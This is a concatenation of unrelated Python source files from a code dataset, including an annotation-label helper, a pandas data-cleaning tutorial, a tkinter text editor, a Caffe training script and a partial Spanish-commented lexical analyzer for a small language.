        root = ET.parse(xml_file).getroot()
        for member in root.findall('object'):
            if member[0].text not in labels:
                labels.append(member[0].text)
    # Context manager guarantees the file is flushed and closed (the handle
    # was previously left open).
    with open(os.path.join(export_dir, 'label_map.pbtxt'), 'w') as w:
        for i, label in enumerate(labels):
            w.write('item {\n  id: ' + str(i + 1) + "\n  name: '" + label + "'\n}\n\n")
    print(f'[INFO] label_map.pbtxt exported to {export_dir}')
def counter(path):
    """Print how many times each label occurs across all xml files in *path*."""
    tally = {}
    for annotation in glob.glob(path + '/*.xml'):
        for obj in ET.parse(annotation).getroot().findall('object'):
            label = obj[0].text
            tally[label] = tally.get(label, 0) + 1
    print('[INFO] Label Counter')
    # Insertion order == first-seen order, matching the collection loop.
    for position, (label, total) in enumerate(tally.items()):
        print(f'  {position + 1}. {label} : {total}')
def search(path, indexs):
    """Print, per label, which annotation files contain that label.

    *indexs* is a comma-separated string of label names; one '#'-framed
    section is printed per requested label.
    """
    # xml basename -> list of labels found inside it
    images = {}
    for xml_file in glob.glob(path + '/*.xml'):
        images[os.path.basename(xml_file)] = []
        root = ET.parse(xml_file).getroot()
        for member in root.findall('object'):
            images[os.path.basename(xml_file)].append(member[0].text)
    print('[INFO] Label Finder')
    for label in indexs.split(','):
        print(f' {label} '.center(20, '#'))
        for img in [x for x, y in images.items() if label in y]:
            print(f'  - {img}')
        print()
def lower(path):
    """Rewrite every xml file in *path* with all object labels lower-cased."""
    for annotation in glob.glob(path + '/*.xml'):
        tree_root = ET.parse(annotation).getroot()
        for obj in tree_root.findall('object'):
            obj[0].text = obj[0].text.lower()
        serialized = ET.tostring(tree_root)
        with open(annotation, "wb") as out:
            out.write(serialized)
def UA(path):
    """Sync each xml's <filename> field with the xml file's own basename.

    (The previous docstring was copy-pasted from lower() and wrong.)
    When the stored image name's stem differs from the xml's stem, the stem
    is replaced and the extension is re-resolved: .jpg if such a file
    exists in *path*, otherwise .jpeg is assumed.
    """
    for xml_file in glob.glob(path + '/*.xml'):
        root = ET.parse(xml_file).getroot()
        # [stem, extension] pairs for the recorded image and the xml itself.
        img_file = list(os.path.splitext(os.path.basename(root.find('filename').text)))
        xml_file_ = list(os.path.splitext(os.path.basename(xml_file)))
        if img_file[0] != xml_file_[0]:
            img_file[0] = xml_file_[0]
            if os.path.isfile(os.path.join(path, img_file[0] + '.jpg')):
                img_file[1] = '.jpg'
            else:
                # NOTE(review): falls back to .jpeg even if no such image
                # exists — confirm that is acceptable.
                img_file[1] = '.jpeg'
            img_file = img_file[0] + img_file[1]
            root.find('filename').text = img_file
            print(f'[INFO] Writing {xml_file}')
            element = ET.tostring(root)
            with open(xml_file, "wb") as w:
                w.write(element)
if __name__ == '__main__':
    # CLI entry point: -d selects the image/annotation folder; each other
    # flag triggers one maintenance action and several can be combined.
    parser = argparse.ArgumentParser(description="Labeling helper script")
    parser.add_argument("-d",
                        "--img_dir",
                        help="Path to the folder where the images is stored.",
                        type=str)
    parser.add_argument("-l",
                        "--to_lower",
                        help="Lower all labels in xml files.",
                        action='store_true')
    parser.add_argument("-c",
                        "--counter",
                        help="Count each label of all the xml files",
                        action='store_true')
    parser.add_argument("-s",
                        "--search",
                        help="Find images with specific label",
                        type=str)
    parser.add_argument("-lm",
                        "--label_map",
                        help="Create label_map.pbtxt",
                        type=str)
    parser.add_argument("-ar",
                        "--auto_remove",
                        help="Delete xlm files without img",
                        action='store_true')
    parser.add_argument("-ua",
                        "--update_annotation",
                        help="Update annotation",
                        action='store_true')
    args = parser.parse_args()
    # -d is mandatory for every action.
    if args.img_dir is None:
        raise KeyError('Harus menyertakan -d argument atau folder dimana images disimpan')
    if args.to_lower:
        lower(args.img_dir)
    if args.counter:
        counter(args.img_dir)
    if args.search:
        search(args.img_dir, args.search)
    if args.label_map:
        make_labelmap(args.img_dir, args.label_map)
    if args.auto_remove:
        auto_remove(args.img_dir)
    if args.update_annotation:
        UA(args.img_dir)
74286571624 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# PYTHON_ARGCOMPLETE_OK
# Pass --help flag for help on command-line interface
import sympy as sp
import numpy as np
from pyneqsys.symbolic import SymbolicSys
def solve(guess_a, guess_b, power, solver='scipy'):
    """ Constructs a pyneqsys.symbolic.SymbolicSys instance and returns from its ``solve`` method.

    guess_a, guess_b: initial guesses for x0 and x1.
    power: the (integer) exponent ``p`` appearing in both equations.
    solver: backend name forwarded to SymbolicSys.solve (default 'scipy').
    """
    # The problem is 2 dimensional so we need 2 symbols
    x = sp.symbols('x:2', real=True)
    # There is a user specified parameter ``p`` in this problem:
    p = sp.Symbol('p', real=True, negative=False, integer=True)
    # Our system consists of 2-non-linear equations:
    f = [x[0] + (x[0] - x[1])**p/2 - 1,
         (x[1] - x[0])**p/2 + x[1]]
    # We construct our ``SymbolicSys`` instance by passing variables, equations and parameters:
    neqsys = SymbolicSys(x, f, [p])  # (this will derive the Jacobian symbolically)
    # Finally we solve the system using user-specified ``solver`` choice:
    return neqsys.solve([guess_a, guess_b], [power], solver=solver)
def main(guess_a=1., guess_b=0., power=3, savetxt='None', verbose=False):
    """
    Example demonstrating how to solve a system of non-linear equations defined as SymPy expressions.

    The example shows how a non-linear problem can be given a command-line interface which may be
    preferred by end-users who are not familiar with Python.

    If *savetxt* is anything other than the string 'None', the solution
    vector is written to that path instead of being printed.
    """
    x, sol = solve(guess_a, guess_b, power)  # see function definition above
    assert sol.success
    if savetxt != 'None':
        # BUG FIX: the arguments were reversed (``np.savetxt(x, savetxt)``);
        # numpy's signature is ``savetxt(fname, X)``.
        np.savetxt(savetxt, x)
    else:
        if verbose:
            print(sol)
        else:
            print(x)
if __name__ == '__main__':  # are we running from the command line (or are we being imported from)?
    try:
        # argh turns main()'s signature into a CLI automatically.
        import argh
        argh.dispatch_command(main, output_file=None)
    except ImportError:
        import sys
        if len(sys.argv) > 1:
            # argh is missing, so CLI arguments cannot be parsed; warn and
            # fall through to running with the defaults.
            import warnings
            warnings.warn("Ignoring parameters run "
                          "'pip install --user argh' to fix.")
        main()
| bjodah/pyneqsys | examples/bi_dimensional.py | bi_dimensional.py | py | 2,055 | python | en | code | 38 | github-code | 36 |
10746701513 | #!/usr/bin/env python
# -*- coding:utf-8 -*-
# @Time : 2020/10/15 10:19 PM
# @Author: Zechen Li
# @File : aug.py.py
from glue.tasks import get_task
import pandas as pd
import numpy as np
import os
from augment.eda import *
import argparse
# CLI flags: EDA strength (alpha), how many augmented variants per sentence,
# how many augmentation methods to sample from, and the GLUE task/paths.
parser = argparse.ArgumentParser()
parser.add_argument('--alpha', default=0.1, type=float)
parser.add_argument('--num_aug', default=1, type=int)
parser.add_argument('--num_type', default=4, type=int)
parser.add_argument('--task_name', default='CoLA')
parser.add_argument('--dataroot', default='./glue_data/')
parser.add_argument('--aug_dataroot', default='./aug_data/')
args = parser.parse_args()
alpha = args.alpha
num_aug = args.num_aug
num_type = args.num_type
task_name = args.task_name
task_dir = os.path.join(args.dataroot, task_name)
task = get_task(task_name.lower(), task_dir)
output_dir = os.path.join(args.aug_dataroot, task_name)
# Ignore "directory already exists"; other OSErrors are swallowed too.
try:
    os.makedirs(output_dir)
except OSError:
    pass
ori_train_df = task.get_train_df()
ori_dev_df = task.get_dev_df()
aug_train_df = pd.DataFrame(columns=["sentence", "label"])
print("Trainning dataset preview:")
print("train sentences num:", len(ori_train_df))
print("Original:", ori_train_df.head())
# For each training sentence: pick a random augmentation method, run EDA,
# and record every augmented variant labelled with the method used.
# NOTE(review): DataFrame.append inside a loop is quadratic and was removed
# in pandas 2.0 — consider collecting rows in a list and building the
# frame once.
for i in ori_train_df.sentence:
    ori_train_sentence = i
    method_label = np.random.randint(0, num_type, 1)[0]
    method = augment_single_with_label(method_label)
    aug_train_sentences = eda(ori_train_sentence, alpha=alpha, num_aug=num_aug, method=method)
    for aug_sentence in aug_train_sentences:
        aug_train_df = aug_train_df.append({'sentence': aug_sentence, 'label': method}, ignore_index=True)
print("Augment:", aug_train_df.head())
print(aug_train_df['label'].value_counts(normalize=True) * 100)
aug_train_df.to_csv(os.path.join(output_dir, "train.tsv"), sep='\t', index=False)
print('---------------------------------------------------------')
# Same procedure for the dev split.
aug_dev_df = pd.DataFrame(columns=["sentence", "label"])
print("Dev dataset preview:")
print("dev sentences num:", len(ori_dev_df))
print("Original:", ori_dev_df.head())
for i in ori_dev_df.sentence:
    ori_dev_sentence = i
    method_label = np.random.randint(0, num_type, 1)[0]
    method = augment_single_with_label(method_label)
    aug_dev_sentences = eda(ori_dev_sentence, alpha=alpha, num_aug=num_aug, method=method)
    for aug_sentence in aug_dev_sentences:
        aug_dev_df = aug_dev_df.append({'sentence': aug_sentence, 'label': method}, ignore_index=True)
print("Augment:", aug_dev_df.head())
print(aug_dev_df['label'].value_counts(normalize=True) * 100)
aug_dev_df.to_csv(os.path.join(output_dir, "dev.tsv"), sep='\t', index=False)
print("generated augmented sentences finished.")
| UCSD-AI4H/SSReg | SSL-Reg-SATP/aug.py | aug.py | py | 2,685 | python | en | code | 8 | github-code | 36 |
14858436454 |
def get_input_lines():
return [line.strip() for line in open(0).readlines()]
def get_req():
# 12 red cubes, 13 green cubes, and 14 blue cubes
return {
'red':12,
'green':13,
'blue':14,
}
def main():
input_lines = get_input_lines()
req = get_req()
total = 0
for line in input_lines:
label, info = line.split(':')
id = int(label.split()[-1])
line_valid = True
for rev_cycle in info.split(';'):
for ball_info in rev_cycle.split(','):
count, color = ball_info.split()
if int(count) > req[color]:
line_valid = False
break
if not line_valid:
continue
total += id
print(total)
if __name__=='__main__':
main() | balker0322/advent_of_code | 2023_day_02/part1.py | part1.py | py | 812 | python | en | code | 0 | github-code | 36 |
74646034024 |
from tkinter import *
from tkinter import messagebox
from tkColorPicker import *
from tkinter import filedialog
from tkinter.filedialog import askopenfilename
from tkinter import filedialog
from tkinter import scrolledtext
import fileinput
import os
class menuBar(object):
    """Minimal text-editor demo: a Tk window with menus, a color picker and
    open/save dialogs around a scrolled text widget.

    NOTE: instantiating this class blocks in ``mainloop()`` until the
    window is closed.
    NOTE(review): ``tk`` is never imported in this file (only
    ``from tkinter import *``); unless ``tkColorPicker`` re-exports it,
    ``tk.WORD`` / ``tk.INSERT`` below will raise NameError — confirm.
    """
    def __init__(self):
        self.bgcolor = None
        # Path of the currently opened file and its handle.
        self.file = None
        self.f = None
        # Create the main window.
        self.root = Tk()
        self.root.title('菜单栏')
        self.root.geometry('500x500')
        # self.fram = Tk.frame(self.root)
        # self.fram.pack()
        self.create_menu()
        self.root.mainloop()
    # Build the menu bar.
    def create_menu(self):
        # Create the menu bar.
        self.menuBar = Menu(self.root)
        self.root.config(menu=self.menuBar)
        # First top-level menu.
        self.fillBar = Menu(self.menuBar, tearoff=0)
        self.menuBar.add_cascade(label='第一个菜单栏', menu=self.fillBar)
        self.twoBar = Menu(self.menuBar, tearoff=0)
        self.menuBar.add_cascade(label='Open', menu=self.twoBar)
        # Second-level items under the first menu.
        self.fillBar.add_command(label='new', command=self.winOne)
        self.fillBar.add_separator()
        self.fillBar.add_command(label='Exit', command=self.ExitClick)
        self.twoBar.add_command(label='OpenColor', command=self.Open_Color)
        self.twoBar.add_separator()
        # accelerator: text appended after the menu entry label.
        self.twoBar.add_command(label='打开', command=self.Open_File, accelerator='Ctr + O')
        self.twoBar.bind_all("<Control-o>", self.Open_File)
        self.twoBar.add_separator()
        self.twoBar.add_command(label='保存', command=self.Save_File)
        self.twoBar.add_command(label='另存为',command=self.Saves_File)
        # Create the text area.
        self.textnew = scrolledtext.ScrolledText(self.root, fg=self.bgcolor, width=100, height=100, wrap=tk.WORD)
        # textnew.grid()
        self.textnew.pack()
    # Close handler.
    def ExitClick(self):
        # Close the window.
        self.root.quit()
        # Destroy all widgets so their memory is reclaimed.
        self.root.destroy()
        exit()
    # Open a child window.
    def winOne(self):
        top1 = Toplevel()
        top1.title('子窗口')
        top1.geometry('400x300')
        but1 = Button(top1, text='子窗体按钮', command=self.help_test)
        but1.pack()
        # Remove the maximize/minimize buttons:
        # top1.attributes('-toolwindow', 1)
        top1.focus_get()
        # Keep the window on top.
        top1.wm_attributes('-topmost', 1)
    def help_test(self):
        '''
        messagebox dialogs and their button return values:
        askokcancel   OK/Cancel dialog, returns True/False
        askquestion   Yes/No dialog, returns 'yes'/'no'
        askyesno      Yes/No dialog, returns True/False
        showerror     error dialog, returns 'ok'
        showinfo      returns 'ok'
        showwarning   warning dialog, returns 'ok'
        :return:
        '''
        ask = messagebox.askokcancel('点击','按钮被点击了',)
        if ask:
            print('确定',ask)
        else:
            print('取消')
    # Open the color-picker panel and apply the chosen foreground color.
    def Open_Color(self):
        # color = askcolor('red',0,'颜色面板')
        # if color[1] != None:
        #     print('选中的颜色是:',color)
        #     self.bgcolor = color[1]
        # else:
        #     print('没有选择颜色!',color)
        color = askcolor()
        self.textnew["foreground"] = color[1]
    def Open_File(self,event=None):
        self.file = askopenfilename(filetypes=[('txt','*.txt')])
        # Load the chosen file into the text widget.
        for line in fileinput.input(self.file):
            self.textnew.insert("1.0",line)
    def Save_File(self):
        # Grab the current contents of the text widget.
        test = self.textnew.get(1.0,END)
        # print(test)
        # If a file is already open, overwrite it in place...
        # if os.path.isfile(self.file):
        if self.file!=None:
            self.f = open(self.file, 'w')
            # Persist the (possibly edited) text.
            self.f.write(str(test))
            self.f.close()
        else:
            # ...otherwise fall back to a "save as" dialog.
            name = filedialog.asksaveasfilename(title='保存文件', filetypes=[('保存文件','*.txt')],defaultextension='.txt')
            print('aa', name)
            if name:
                fop = open(name, 'w')
                fop.write(str(test))
                # fop.fileno()
                fop.close()
    def Saves_File(self):
        # Grab the current contents of the text widget.
        test = self.textnew.get(1.0, END)
        # Always prompt for a destination ("save as").
        name = filedialog.asksaveasfilename(title='保存文件', filetypes=[('保存文件', '*.txt')], defaultextension='.txt')
        print('aa', name)
        if name:
            fop = open(name, 'w')
            fop.write(str(test))
            # fop.fileno()
            fop.close()
    def delete(self):
        self.textnew.insert(tk.INSERT, '')
        self.textnew.update()

# Building the instance starts the GUI and blocks until it is closed.
menu_bar = menuBar()
| iospeng/python | pycharm_demo/demo/python/demo1/menuBar_text.py | menuBar_text.py | py | 5,132 | python | zh | code | 0 | github-code | 36 |
4767724527 | import os
#os.environ['GLOG_minloglevel'] = '2'
from tqdm import trange
import caffe
import argparse
import pandas as pd
def main(solver_proto, out_dir):
    """Train a Caffe solver and dump train/test loss curves as CSV files.

    Runs max_iter steps in chunks of test_interval, sampling the train loss
    every step and the test loss after each chunk.
    NOTE(review): the first test_loss entry is an ndarray (``.copy()``)
    while later entries are scalars (``.ravel()[0]``) — the first CSV row
    will contain an array repr; confirm this is intended.
    """
    caffe.set_mode_gpu()
    solver = caffe.SGDSolver(solver_proto)
    train_loss, test_loss = [], []
    test_loss.append(solver.test_nets[0].blobs['loss'].data.copy())
    for ix in trange(solver.param.max_iter, desc='overall progress'): #):
        for jx in trange(solver.param.test_interval, desc='until next test'):
            solver.step(1)
            train_loss.append(solver.net.blobs['loss'].data.ravel()[0])
        test_loss.append(solver.test_nets[0].blobs['loss'].data.ravel()[0])
        # NOTE(review): ``ix % 1 == 0`` is always true, so a snapshot and a
        # full CSV rewrite happen on every outer iteration — likely a
        # leftover interval constant; confirm the intended period.
        if ix % 1 == 0:
            solver.snapshot()
            pd.DataFrame(train_loss, columns=['train_loss']).to_csv(os.path.join(out_dir, 'train_loss.csv'))
            pd.DataFrame(test_loss, columns=['test_loss']).to_csv(os.path.join(out_dir, 'test_loss.csv'))
if __name__ == '__main__':
    # CLI: --solver points at the solver prototxt, --out_dir receives CSVs.
    parser = argparse.ArgumentParser()
    parser.add_argument('--solver', required=True, type=str)
    parser.add_argument('--out_dir', default='.')
    args = parser.parse_args()
    main(args.solver, args.out_dir)
| alexkreimer/monocular-odometry | tools/solve.py | solve.py | py | 1,237 | python | en | code | 1 | github-code | 36 |
14145244822 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Wed Feb 12 22:29:57 2020
@author: b
https://www.kaggle.com/kanncaa1/data-sciencetutorial-for-beginners#1.-INTRODUCTION-TO-PYTHON
3.CLEANING DATA
DIAGNOSE DATA for CLEANING
We need to diagnose and clean data before exploring.
Unclean data:
Column name inconsistency like upper-lower case letter or space between words
missing data
different language
We will use head, tail, columns, shape and info methods to diagnose data
"""
import numpy as np # linear algebra
import pandas as pd # data processing, CSV file I/O (e.g. pd.read_csv)
import matplotlib.pyplot as plt
import seaborn as sns # visualization tool
# Input data files are available in the "../input/" directory.
# For example, running this (by clicking run or pressing Shift+Enter) will list the files in the input directory
from subprocess import check_output
print(check_output(["ls"]).decode("utf8"))
# Any results you write to the current directory are saved as output.
import os
os.chdir ('/home/b/Documents/Python/Data/Pokemon Challenge')
data = pd.read_csv('pokemon.csv')
# tail shows the last 5 rows
data.tail()
# columns gives the column names of the features
data.columns
# shape gives the number of rows and columns as a tuple
data.shape
# info gives the data type (e.g. dataframe), number of samples/rows, number of features/columns, feature types and memory usage
data.info()
"""
EXPLORATORY DATA ANALYSIS
value_counts(): frequency counts
outliers: values that are considerably higher or lower than the rest of the data
    Let's say the value at 75% is Q3 and the value at 25% is Q1.
    Outliers are smaller than Q1 - 1.5*(Q3-Q1) or bigger than Q3 + 1.5*(Q3-Q1), where (Q3-Q1) = IQR.
We will use the describe() method. Describe includes:
    count: number of entries
    mean: average of entries
    std: standard deviation
    min: minimum entry
    25%: first quartile
    50%: median or second quartile
    75%: third quartile
    max: maximum entry
"""
# For example, let's look at the frequency of pokemon types
print(data['Type 1'].value_counts(dropna =False))  # with dropna=False, NaN values are counted as well
# As can be seen below there are 112 water pokemon and 70 grass pokemon
# For example max HP is 255 and min defense is 5
data.describe() #ignores null entries
"""
VISUAL EXPLORATORY DATA ANALYSIS
Box plots: visualize basic statistics like outliers, min/max or quantiles
"""
# For example: compare the attack of pokemons that are legendary or not
# Black line at top is max
# Blue line at top is 75%
# Red line is median (50%)
# Blue line at bottom is 25%
# Black line at bottom is min
# There are no outliers
data.boxplot(column='Attack',by = 'Legendary')
"""
TIDY DATA
We tidy data with melt(). Describing melt in words is confusing, so let's work through an example to understand it.
"""
# First I create a small frame from the pokemon data to explain melt more easily.
data_new = data.head()    # I only take 5 rows into the new data
data_new
# let's melt
# id_vars = the columns we do not wish to melt
# value_vars = the columns we want to melt
melted = pd.melt(frame=data_new,id_vars = 'Name', value_vars= ['Attack','Defense'])
melted
"""
PIVOTING DATA
Reverse of melting.
"""
# Index is name
# The entries of 'variable' become the new columns
# The entries of 'value' fill those columns
melted.pivot(index = 'Name', columns = 'variable',values='value')
"""
DATA TYPES
There are 5 basic data types: object (string), boolean, integer, float and categorical.
We can convert between data types, e.g. from str to categorical or from int to float.
Why the category dtype is important:
    it makes the dataframe smaller in memory
    it can be utilized for analysis, especially with sklearn (we will learn this later)
"""
data.dtypes
# let's convert object(str) to categorical and int to float.
data['Type 1'] = data['Type 1'].astype('category')
data['Speed'] = data['Speed'].astype('float')
# As you can see, Type 1 is converted from object to categorical
# And Speed is converted from int to float
data.dtypes
"""
MISSING DATA and TESTING WITH ASSERT
If we encounter missing data, we can:
    leave it as is
    drop those rows with dropna()
    fill missing values with fillna()
    fill missing values with a test statistic such as the mean
Assert statement: a check that you can turn on or off when you are done testing the program.
"""
# Let's look at whether the pokemon data has NaN values
# As you can see there are 800 entries. However, Type 2 has 414 non-null objects, so it has 386 null objects.
data.info()
# Let's check Type 2
data["Type 2"].value_counts(dropna =False)
# As you can see, there are 386 NaN values
# Let's drop the NaN values
data1=data   # we will also use data to fill missing values, so I assign it to the data1 variable
# NOTE(review): inplace dropna on a single column changes that Series'
# length — on modern pandas this does not propagate to the DataFrame and
# may warn; confirm on the pandas version in use.
data1["Type 2"].dropna(inplace = True) # inplace = True means we do not assign it to new variable. Changes automatically assigned to data
# So does it work ?
# Let's check with an assert statement
# Assert statement:
assert 1==1 # returns nothing because it is true
# In order to run all code, we need to make this line a comment
# assert 1==2 # returns an error because it is false
assert  data['Type 2'].notnull().all() # returns nothing because we drop nan values
data["Type 2"].fillna('empty',inplace = True)
assert data['Type 2'].notnull().all() # returns nothing because we do not have nan values
# # With assert statements we can check a lot of things. For example:
# assert data.columns[1] == 'Name'
# assert data.Speed.dtypes == np.int
| b846/Data | 3a Python Melt Assert.py | 3a Python Melt Assert.py | py | 5,454 | python | en | code | 0 | github-code | 36 |
5547122437 | #!/local/cluster/bin/python
#biopython take three regions, invert middle, then put together
import sys
from Bio import SeqIO
# Args: <strain> <region_start> <region_end>; reads ../<strain>.gbk and
# writes <strain>.noSI.gbk with the middle region excised.
strain = sys.argv[1]
# include 50 bp margin so as not to interrupt att site in rotated genome
largestart = int(sys.argv[2]) + 50
largeend = int(sys.argv[3]) - 50
infile = "../" + strain + ".gbk"
outfile = strain + ".noSI.gbk"
record = SeqIO.read(infile, "genbank")
# NOTE(review): slicing starts at 1, dropping the record's first base —
# confirm the coordinates are meant to be 1-based.
firstpart = record[1:largestart]
endpart = record[largeend:len(record.seq)]
newrecord = firstpart + endpart
# Write via a context manager so the handle is flushed and closed
# (previously it was left open).
with open(outfile, 'w') as fw:
    SeqIO.write(newrecord, fw, "genbank")
| osuchanglab/BradyrhizobiumGenomeArchitecture | remove_monopartite.py | remove_monopartite.py | py | 547 | python | en | code | 0 | github-code | 36 |
21723031249 | from simbolo import Simbolo, TOKENS, ZONA_DE_CODIGO, TIPO_DATO
from error import Error
import json
# Reserved words of the language, including the boolean literals
# 'false'/'true'; preloaded into the symbol table on lexer construction.
palabras_reservadas = [
    'bool',
    'call',
    'char',
    'do',
    'else',
    'float',
    'for',
    'function',
    'if',
    'int',
    'main',
    'read',
    'return',
    'string',
    'then',
    'to',
    'void',
    'while',
    'write',
    'false',
    'true']
#? List of reserved words
class Lexico:
    def __init__(self, codigo):
        """Build a lexical analyzer over *codigo* and preload reserved words."""
        self.codigo = " " + codigo + " "  # source code to compile (padded with spaces)
        self.tablaSimb = []  # symbol table
        self.index = 0  # index of the current character
        self.inicioLex = 1  # start of the current lexeme
        self.Lexema = ""  # last lexeme found
        self.num_linea = 1  # line number in the source code
        self.estado = 0  # current state in the automata
        # presumably the set of single-character punctuation/operator
        # tokens the lexer accepts — TODO confirm
        self.caracteres_permitidos = "(){}[],;+-*/\\%&|!"
        self.tipo_de_dato_actual = 0  # Records the data type of the identifiers.
        self.zona_de_codigo = ZONA_DE_CODIGO['DEF_VARIABLES_GLOBALES']  # Region of the
        # source code currently being processed.
        self.fin_definicion_palabras_reservadas = None  # Marks where the reserved-word
        # definitions end in the symbol table.
        self.fin_definicion_variables_globales = None  # Marks where the global-variable
        # definitions end.
        self.inicio_definicion_variables_locales = None  # Marks where the local variables
        # of the current function start.
        self.fin_definicion_variables_locales = None  # Marks where the local variables
        # of the current function end.
        self.error = Error()
        self.cargar_palabras_reservadas()  # Load the reserved words into
        # the symbol table.
def insertar_simbolo(self, simbolo): #inserta un nuevo simbolor en la TS.
if simbolo:
self.tablaSimb.append(simbolo)
return self.tablaSimb[len(self.tablaSimb)-1]
else:
raise ValueError("Se esperaba un simbolo")
    def cargar_palabras_reservadas(self):
        """Preload every reserved word into the symbol table and record where
        that region of the table ends."""
        for p in palabras_reservadas:
            self.insertar_simbolo(Simbolo(p, TOKENS[p.upper()]))
        self.fin_definicion_palabras_reservadas = len(self.tablaSimb)
    def mostrar_tabla_simbolos(self):
        """Print every entry of the symbol table (debug helper)."""
        for s in self.tablaSimb:
            print(s)
def buscar_lexema(self, lexema): #busca un lexema en la TS.
if self.zona_de_codigo == ZONA_DE_CODIGO['DEF_VARIABLES_GLOBALES']:
for simb in self.tablaSimb:
if lexema == simb.Lexema:
return simb
return None
elif self.zona_de_codigo == ZONA_DE_CODIGO['DEF_VARIABLES_LOCALES']:
for simb in self.tablaSimb[self.inicio_definicion_variables_locales:]:
if lexema == simb.Lexema:
return simb
for simb in self.tablaSimb[:self.fin_definicion_palabras_reservadas]:
if lexema == simb.Lexema:
return simb
return None
elif self.zona_de_codigo == ZONA_DE_CODIGO['CUERPO_FUNCION_LOCAL']:
for simb in self.tablaSimb[self.inicio_definicion_variables_locales:]:
if lexema == simb.Lexema:
return simb
for simb in self.tablaSimb[:self.fin_definicion_variables_globales]:
if lexema == simb.Lexema:
return simb
return None
elif self.zona_de_codigo == ZONA_DE_CODIGO['CUERPO_PRINCIPAL']:
for simb in self.tablaSimb[:self.fin_definicion_variables_globales]:
if lexema == simb.Lexema:
return simb
return None
def tablaSimb2JSON(self): #regresa el contenido de TS en JSON
return json.dumps([obj.__dict__ for obj in self.tablaSimb])
def siguiente_caracter(self): #regresa el siguiente caracter del
self.index += 1 #codigo fuente.
try:
return self.codigo[self.index]
except IndexError:
return '\0'
def saltar_caracter(self): #ignora el caracter actual, por eje-
self.index += 1 #mplo: tabs, espacios, enters, etc.
self.inicioLex = self.index
def leer_lexema(self): #regresa la cadena que se encuentra
self.Lexema = self.codigo[self.inicioLex:self.index + 1]
self.estado = 0 #entre inicioLex y el index.
self.avanza_inicio_lexema()
return self.Lexema
def regresa_caracter(self): #Representa el (*) en un estado de
self.index -= 1 #aceptacion.
def avanza_inicio_lexema(self): #mueve el incioLex un caracter hacia
self.inicioLex = self.index + 1 #adelante
def deshacer_automata(self):
self.index = self.inicioLex
return self.codigo[self.index]
def siguiente_componente_lexico(self): #regresa el siguiente simbolo encon-
while(True): #trado en el codigo fuente.
if self.estado == 0:
c = self.siguiente_caracter()
if c ==' ' or c =='\t' or c == '\n':
self.avanza_inicio_lexema() #Ignorar todo tipo de espacios
if c == '\n': #en blanco
self.num_linea += 1 #incrementar num_line en enter.
elif c == '\0':
return None
elif c == '<':
self.estado = 1
elif c == '=':
self.estado = 5
elif c == '>':
self.estado = 6
else:
self.estado = self.fallo() #Probar el siguiente automata.
elif self.estado == 1:
c = self.siguiente_caracter() #Todos los estados intermedios
if c == '=': #deben llamar a siguiente_caracter
self.estado = 2
elif c == '>':
self.estado = 3
else:
self.estado = 4
elif self.estado == 2:
self.leer_lexema()
return(Simbolo(self.Lexema,TOKENS['MEI']))
elif self.estado == 3:
self.leer_lexema()
return(Simbolo(self.Lexema,TOKENS['DIF']))
elif self.estado == 4:
self.regresa_caracter()
self.leer_lexema()
return(Simbolo(self.Lexema,TOKENS['MEN']))
elif self.estado == 5:
self.leer_lexema()
return(Simbolo(self.Lexema,TOKENS['IGU']))
elif self.estado == 6:
c = self.siguiente_caracter()
if c == '=':
self.estado = 7
else:
self.estado = 8
elif self.estado == 7:
self.leer_lexema()
return Simbolo(self.Lexema, TOKENS['MAI'])
elif self.estado == 8:
self.regresa_caracter()
self.leer_lexema()
return Simbolo(self.Lexema, TOKENS['MAY'])
elif self.estado == 9:
if c.isalpha():
self.estado = 10
else:
self.estado = self.fallo()
elif self.estado == 10:
c = self.siguiente_caracter()
if not c.isalnum():
self.estado = 11
elif self.estado == 11:
self.regresa_caracter()
self.leer_lexema()
simb = self.buscar_lexema(self.Lexema)
if self.zona_de_codigo == 0 or self.zona_de_codigo == 1:
if simb and simb.Token != TOKENS['ID']:
return simb
elif simb is None:
return self.insertar_simbolo(Simbolo(self.Lexema, TOKENS['ID'], self.tipo_de_dato_actual))
elif simb.Token == TOKENS['ID']:
self.error.reportar_error(self.num_linea, "Semantico", "La variable '{}' ya fue definida en el ambito actual.".format(self.Lexema))
return simb
elif self.zona_de_codigo == 2 or self.zona_de_codigo == 3:
if simb:
return simb
else:
self.error.reportar_error(self.num_linea, "Semantico", "La variable '{}' no fue declarada.".format(self.Lexema))
return self.insertar_simbolo(Simbolo(self.Lexema, TOKENS['ID'], TIPO_DATO['na']))
elif self.estado == 12:
if c.isdigit():
self.estado = 13
else:
self.estado = self.fallo()
elif self.estado == 13:
c = self.siguiente_caracter()
if c == 'E' or c == 'e':
self.estado = 16
elif c == '.':
self.estado = 14
elif not c.isdigit():
self.estado = 20
elif self.estado == 14:
c = self.siguiente_caracter()
if c.isdigit():
self.estado = 15
else:
self.estado = self.fallo()
elif self.estado == 15:
c = self.siguiente_caracter()
if c == 'E' or c == 'e':
self.estado = 16
elif not c.isdigit():
self.estado = 21
elif self.estado == 16:
c = self.siguiente_caracter()
if c == '+' or c == '-':
self.estado = 17
elif c.isdigit():
self.estado = 18
else:
self.es = self.fallo()
elif self.estado == 17:
c = self.siguiente_caracter()
if c.isdigit():
self.estado = 18
else: self.estado = self.fallo()
elif self.estado == 18:
c =self.siguiente_caracter()
if not c.isdigit():
self.estado = 19
elif self.estado == 19:
self.regresa_caracter()
self.leer_lexema()
return Simbolo(self.Lexema, TOKENS['NUMF'])
elif self.estado == 20:
self.regresa_caracter()
self.leer_lexema()
return Simbolo(self.Lexema, TOKENS['NUM'])
elif self.estado == 21:
self.regresa_caracter()
self.leer_lexema()
return Simbolo(self.Lexema, TOKENS['NUMF'])
elif self.estado == 22:
if c == '"':
self.estado = 23
else:
self.estado = self.fallo()
elif self.estado == 23:
c = self.siguiente_caracter()
if c == "\\":
self.estado = 24
elif c == '"':
self.estado = 25
elif self.estado == 24:
c = self.siguiente_caracter()
if c in 'nta"\\r':
self.estado = 23
else:
self.estado = self.fallo()
elif self.estado == 25:
self.leer_lexema()
return Simbolo(self.Lexema, TOKENS['CONST_STRING'])
elif self.estado == 26:
if c == "'":
self.estado = 27
else:
self.estado = self.fallo()
elif self.estado == 27:
c = self.siguiente_caracter()
if c == '\\':
self.estado = 28
else:
self.estado = 29
elif self.estado == 28:
c = self.siguiente_caracter()
if c in "nta'\\r":
self.estado = 29
else:
self.estado = self.fallo()
elif self.estado == 29:
c = self.siguiente_caracter()
if c == "'":
self.estado = 30
else:
self.estado = self.fallo()
elif self.estado == 30:
self.leer_lexema()
